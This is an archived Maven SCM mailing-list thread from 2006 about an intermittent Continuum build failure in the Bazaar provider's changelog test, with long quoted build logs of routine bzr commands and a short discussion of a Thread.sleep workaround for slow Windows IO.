_once_ while manually running the test suite on Linux and bzr 0.7 (out of 20 times with different configurations of OS, bzr versions and debug info). I'm out of ideas here... I saw that there was a Thread.sleep(1000) at the beginning of he ChangeLogTckTest. Why is that? Do we have any IO issues here? Regards Torbjørn -----Original Message----- From: Emmanuel Venisse [mailto:[email protected]] Sent: 28. mars 2006 21:17 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider The error is here : http://ci.codehaus.org:8002/continuum/servlet/browse?file=80/target/surefire -reports/org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChange LogCommandTckTest.txt Emmanuel Brett Porter a écrit : > bzr seems to be correctly installed now. Anyone have any ideas on this one? > > - Brett > > Continuum Build Server wrote: > >>Online report : http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild .vm/view/ProjectBuild/id/80/buildId/490 >>Build statistics: >> State: Failed >> Previous State: Failed >> Started at: Tue, 28 Mar 2006 05:05:12 -0800 >> Finished at: Tue, 28 Mar 2006 05:05:42 -0800 >> Total time: 29s >> Build Trigger: Schedule >> Exit code: 1 >> Building machine hostname: cheddar.simulalabs.com >> Operating system : Linux(unknown) >> Java version : 1.5.0_03(Sun Microsystems Inc.) >> >>Changes >> evenisse Formatting >> /maven/scm/trunk/maven-scm-api/src/main/java/org/apache/maven/scm/command/ad d/AddScmResult.java >> /maven/scm/trunk/maven-scm-plugin/src/main/java/org/apache/maven/scm/plugin/ AbstractScmMojo.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java /org/apache/maven/scm/provider/bazaar/BazaarConfig.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java /org/apache/maven/scm/provider/bazaar/BazaarUtils.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java /org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogComma nd.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java /org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsu mer.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java /org/apache/maven/scm/provider/bazaar/command/diff/BazaarDiffConsumer.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java /org/apache/maven/scm/provider/bazaar/BazaarTestUtils.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java /org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsu merTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-clearcase/src/test/j ava/org/apache/maven/scm/provider/clearcase/command/checkout/ClearCaseCheckO utCommandTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/main/ja va/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLo gConsumer.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/test/ja va/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLo gConsumerTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provi der-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/AbstractC vsScmProvider.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provi der-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/repositor y/CvsScmProviderRepository.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provi der-cvs-commons/src/test/java/org/apache/maven/scm/provider/cvslib/repositor y/CvsScmProviderRepositoryTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-svn/maven-scm-provi der-svnexe/src/test/java/org/apache/maven/scm/provider/svn/svnexe/command/Sv nCommandLineUtilsTest.java >> >>************************************************************************** ** >>Output: >>************************************************************************** ** >>[INFO] Scanning for projects... >>[INFO] ------------------------------------------------------------------- --------- >>[INFO] Building Maven SCM Bazaar Provider >>[INFO] task-segment: [clean, install] >>[INFO] ------------------------------------------------------------------- --------- >>[INFO] [clean:clean] >>[INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target >>[INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target/classes >>[INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target/test-classes >>[INFO] [resources:resources] >>[INFO] Using default encoding to copy filtered resources. >>[INFO] [compiler:compile] >>Compiling 20 source files to /home/continuum/continuum-maven/working-directory/80/target/classes >>[INFO] [resources:testResources] >>[INFO] Using default encoding to copy filtered resources. >>[INFO] [compiler:testCompile] >>Compiling 8 source files to /home/continuum/continuum-maven/working-directory/80/target/test-classes >>[INFO] [surefire:test] >>[INFO] Setting reports dir: /home/continuum/continuum-maven/working-directory/80/target/surefire-reports >> >>------------------------------------------------------- >> T E S T S >>------------------------------------------------------- >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTes t >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/read me.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java >>[INFO] [src/main/java/Foo.java:added] >>[INFO] EXECUTING: bzr status >>[INFO] [src/main/java/Foo.java:added] >>[INFO] [readme.txt:modified] >>[INFO] [src/main/java/Bar.java:unknown] >>[INFO] EXECUTING: bzr commit --message "Commit message" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti on-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti on-copy >>[INFO] EXECUTING: bzr inventory >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/read me.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java >>[INFO] [src/main/java/Foo.java:added] >>[INFO] EXECUTING: bzr commit --message "Commit message" src/main/java/Foo.java >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti on-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti on-copy >>[INFO] EXECUTING: bzr inventory >>[surefire] Tests run: 2, Failures: 0, Errors: 0, Time elapsed: 8.089 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandT est >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/read me.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.289 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/read me.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin g-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin g-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse project.xml >>[INFO] [project.xml:added] >>[INFO] EXECUTING: bzr status >>[INFO] [project.xml:added] >>[INFO] [readme.txt:modified] >>[INFO] EXECUTING: bzr commit --message "No msg" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>[INFO] [src/test/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>[INFO] [src/main/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] EXECUTING: bzr status >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin g-copy/src/main/java/org >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin g-copy/src/test/java/org >>[INFO] [pom.xml:modified] >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 2.921 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/read me.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse project.xml >>[INFO] [project.xml:added] >>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>[INFO] [src/test/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>[INFO] [src/main/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] EXECUTING: bzr diff >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.761 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/read me.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin g-copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin g-copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr add --no-recurse project.xml >>[INFO] [project.xml:added] >>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>[INFO] [src/test/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>[INFO] [src/main/java/org:added] >>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] EXECUTING: bzr status >>[INFO] [project.xml:added] >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy/src/main/java/org >>[INFO] [src/main/java/org/Foo.java:added] >>[INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy/src/test/java/org >>[INFO] [readme.txt:modified] >>[INFO] EXECUTING: bzr commit --message "No msg" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] EXECUTING: bzr pull >>[INFO] EXECUTING: bzr revno >>[INFO] EXECUTING: bzr diff --revision 1 >>[INFO] EXECUTING: bzr log --verbose >> <changelog-entry> >> <date pattern="yyyy-MM-dd">2006-03-28</date> >> <time pattern="HH:mm:ss">05:05:38</time> >> <author><![CDATA[continuum <[email protected]>]]></author> >> <file> >> <name>project.xml</name> >> <revision>2</revision> >> </file> >> <file> >> <name>src/main/java/org/</name> >> <revision>2</revision> >> </file> >> <file> >> <name>src/main/java/org/Foo.java</name> >> <revision>2</revision> >> </file> >> <file> >> <name>src/test/java/org/</name> >> <revision>2</revision> >> </file> >> <file> >> <name>readme.txt</name> >> <revision>2</revision> >> </file> >> <msg><![CDATA[No msg]]></msg> >> </changelog-entry> >> >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 4.862 sec >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogComman dTckTest >>EXECUTING: bzr init >>EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/read me.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ test/java/Test.java >>EXECUTING: bzr commit --message "Add files to test branch" >>[INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working -copy >>[INFO] EXECUTING: bzr inventory >>[INFO] EXECUTING: bzr log --verbose >>[INFO] EXECUTING: bzr status >>[INFO] [readme.txt:modified] >>[INFO] EXECUTING: bzr commit --message "Second changelog" >>[INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch >>[INFO] EXECUTING: bzr log --verbose >>[INFO] EXECUTING: bzr log --verbose >>[surefire] Tests run: 1, Failures: 1, Errors: 0, Time elapsed: 3.115 sec <<<<<<<< FAILURE !! >>[surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogConsum erTest >>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 0.031 sec >>[INFO] ------------------------------------------------------------------- --------- >>[ERROR] BUILD ERROR >>[INFO] ------------------------------------------------------------------- --------- >>[INFO] There are test failures. >>[INFO] ------------------------------------------------------------------- --------- >>[INFO] For more information, run Maven with the -e switch >>[INFO] ------------------------------------------------------------------- --------- >>[INFO] Total time: 28 seconds >>[INFO] Finished at: Tue Mar 28 05:05:42 PST 2006 >>[INFO] Final Memory: 7M/159M >>[INFO] ------------------------------------------------------------------- --------- >> >>************************************************************************** ** >> >> > > > > From [email protected] Wed Mar 29 09:36:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50010 invoked from network); 29 Mar 2006 09:36:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 09:36:37 -0000 Received: (qmail 42816 invoked by uid 500); 29 Mar 2006 09:36:37 -0000 Delivered-To: [email protected] Received: (qmail 42763 invoked by uid 500); 29 Mar 2006 09:36:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 42752 invoked by uid 99); 29 Mar 2006 09:36:37 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 01:36:37 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 29 Mar 2006 01:36:36 -0800 Received: (qmail 24743 invoked from network); 29 Mar 2006 09:36:16 -0000 Received: from 90.20.99-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 29 Mar 2006 09:36:16 -0000 Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 11:36:06 +0200 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I added the sleep because windows is a little slow for IO in some case. Emmanuel Torbjørn Smørgrav a écrit : > I tried to build the provider with continuum and reproduced the failure > once. > After that initital failure - everything works fine. > I also reproduced it _once_ while manually running > the test suite on Linux and bzr 0.7 (out of 20 times with different > configurations of > OS, bzr versions and debug info). > > I'm out of ideas here... > > I saw that there was a Thread.sleep(1000) at the beginning of he > ChangeLogTckTest. > Why is that? Do we have any IO issues here? > > Regards > Torbjørn > > > -----Original Message----- > From: Emmanuel Venisse [mailto:[email protected]] > Sent: 28. mars 2006 21:17 > To: [email protected] > Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider > > > The error is here : > http://ci.codehaus.org:8002/continuum/servlet/browse?file=80/target/surefire > -reports/org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChange > LogCommandTckTest.txt > > Emmanuel > > Brett Porter a écrit : > >>bzr seems to be correctly installed now. Anyone have any ideas on this > > one? > >>- Brett >> >>Continuum Build Server wrote: >> >> >>>Online report : > > http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild > .vm/view/ProjectBuild/id/80/buildId/490 > >>>Build statistics: >>> State: Failed >>> Previous State: Failed >>> Started at: Tue, 28 Mar 2006 05:05:12 -0800 >>> Finished at: Tue, 28 Mar 2006 05:05:42 -0800 >>> Total time: 29s >>> Build Trigger: Schedule >>> Exit code: 1 >>> Building machine hostname: cheddar.simulalabs.com >>> Operating system : Linux(unknown) >>> Java version : 1.5.0_03(Sun Microsystems Inc.) >>> >>>Changes >>> evenisse Formatting >>> > > /maven/scm/trunk/maven-scm-api/src/main/java/org/apache/maven/scm/command/ad > d/AddScmResult.java > > /maven/scm/trunk/maven-scm-plugin/src/main/java/org/apache/maven/scm/plugin/ > AbstractScmMojo.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java > /org/apache/maven/scm/provider/bazaar/BazaarConfig.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java > /org/apache/maven/scm/provider/bazaar/BazaarUtils.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java > /org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogComma > nd.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java > /org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsu > mer.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java > /org/apache/maven/scm/provider/bazaar/command/diff/BazaarDiffConsumer.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java > /org/apache/maven/scm/provider/bazaar/BazaarTestUtils.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java > /org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsu > merTest.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-clearcase/src/test/j > ava/org/apache/maven/scm/provider/clearcase/command/checkout/ClearCaseCheckO > utCommandTest.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/main/ja > va/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLo > gConsumer.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/test/ja > va/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLo > gConsumerTest.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provi > der-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/AbstractC > vsScmProvider.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provi > der-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/repositor > y/CvsScmProviderRepository.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provi > der-cvs-commons/src/test/java/org/apache/maven/scm/provider/cvslib/repositor > y/CvsScmProviderRepositoryTest.java > > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-svn/maven-scm-provi > der-svnexe/src/test/java/org/apache/maven/scm/provider/svn/svnexe/command/Sv > nCommandLineUtilsTest.java > >>>************************************************************************** > > ** > >>>Output: >>>************************************************************************** > > ** > >>>[INFO] Scanning for projects... >>>[INFO] ------------------------------------------------------------------- > > --------- > >>>[INFO] Building Maven SCM Bazaar Provider >>>[INFO] task-segment: [clean, install] >>>[INFO] ------------------------------------------------------------------- > > --------- > >>>[INFO] [clean:clean] >>>[INFO] Deleting directory > > /home/continuum/continuum-maven/working-directory/80/target > >>>[INFO] Deleting directory > > /home/continuum/continuum-maven/working-directory/80/target/classes > >>>[INFO] Deleting directory > > /home/continuum/continuum-maven/working-directory/80/target/test-classes > >>>[INFO] [resources:resources] >>>[INFO] Using default encoding to copy filtered resources. >>>[INFO] [compiler:compile] >>>Compiling 20 source files to > > /home/continuum/continuum-maven/working-directory/80/target/classes > >>>[INFO] [resources:testResources] >>>[INFO] Using default encoding to copy filtered resources. >>>[INFO] [compiler:testCompile] >>>Compiling 8 source files to > > /home/continuum/continuum-maven/working-directory/80/target/test-classes > >>>[INFO] [surefire:test] >>>[INFO] Setting reports dir: > > /home/continuum/continuum-maven/working-directory/80/target/surefire-reports > >>>------------------------------------------------------- >>>T E S T S >>>------------------------------------------------------- >>>[surefire] Running > > org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTes > t > >>>EXECUTING: bzr init >>>EXECUTING: bzr add > > /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. > xml > /home/continuum/continuum-maven/working-directory/80/target/test-branch/read > me.txt > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > main/java/Application.java > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > test/java/Test.java > >>>EXECUTING: bzr commit --message "Add files to test branch" >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java >>>[INFO] [src/main/java/Foo.java:added] >>>[INFO] EXECUTING: bzr status >>>[INFO] [src/main/java/Foo.java:added] >>>[INFO] [readme.txt:modified] >>>[INFO] [src/main/java/Bar.java:unknown] >>>[INFO] EXECUTING: bzr commit --message "Commit message" >>>[INFO] EXECUTING: bzr push > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti > on-copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti > on-copy > >>>[INFO] EXECUTING: bzr inventory >>>EXECUTING: bzr init >>>EXECUTING: bzr add > > /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. > xml > /home/continuum/continuum-maven/working-directory/80/target/test-branch/read > me.txt > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > main/java/Application.java > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > test/java/Test.java > >>>EXECUTING: bzr commit --message "Add files to test branch" >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java >>>[INFO] [src/main/java/Foo.java:added] >>>[INFO] EXECUTING: bzr commit --message "Commit message" > > src/main/java/Foo.java > >>>[INFO] EXECUTING: bzr push > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti > on-copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/asserti > on-copy > >>>[INFO] EXECUTING: bzr inventory >>>[surefire] Tests run: 2, Failures: 0, Errors: 0, Time elapsed: 8.089 sec >>>[surefire] Running > > org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandT > est > >>>EXECUTING: bzr init >>>EXECUTING: bzr add > > /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. > xml > /home/continuum/continuum-maven/working-directory/80/target/test-branch/read > me.txt > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > main/java/Application.java > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > test/java/Test.java > >>>EXECUTING: bzr commit --message "Add files to test branch" >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.289 sec >>>[surefire] Running > > org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest > >>>EXECUTING: bzr init >>>EXECUTING: bzr add > > /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. > xml > /home/continuum/continuum-maven/working-directory/80/target/test-branch/read > me.txt > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > main/java/Application.java > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > test/java/Test.java > >>>EXECUTING: bzr commit --message "Add files to test branch" >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin > g-copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin > g-copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] EXECUTING: bzr add --no-recurse project.xml >>>[INFO] [project.xml:added] >>>[INFO] EXECUTING: bzr status >>>[INFO] [project.xml:added] >>>[INFO] [readme.txt:modified] 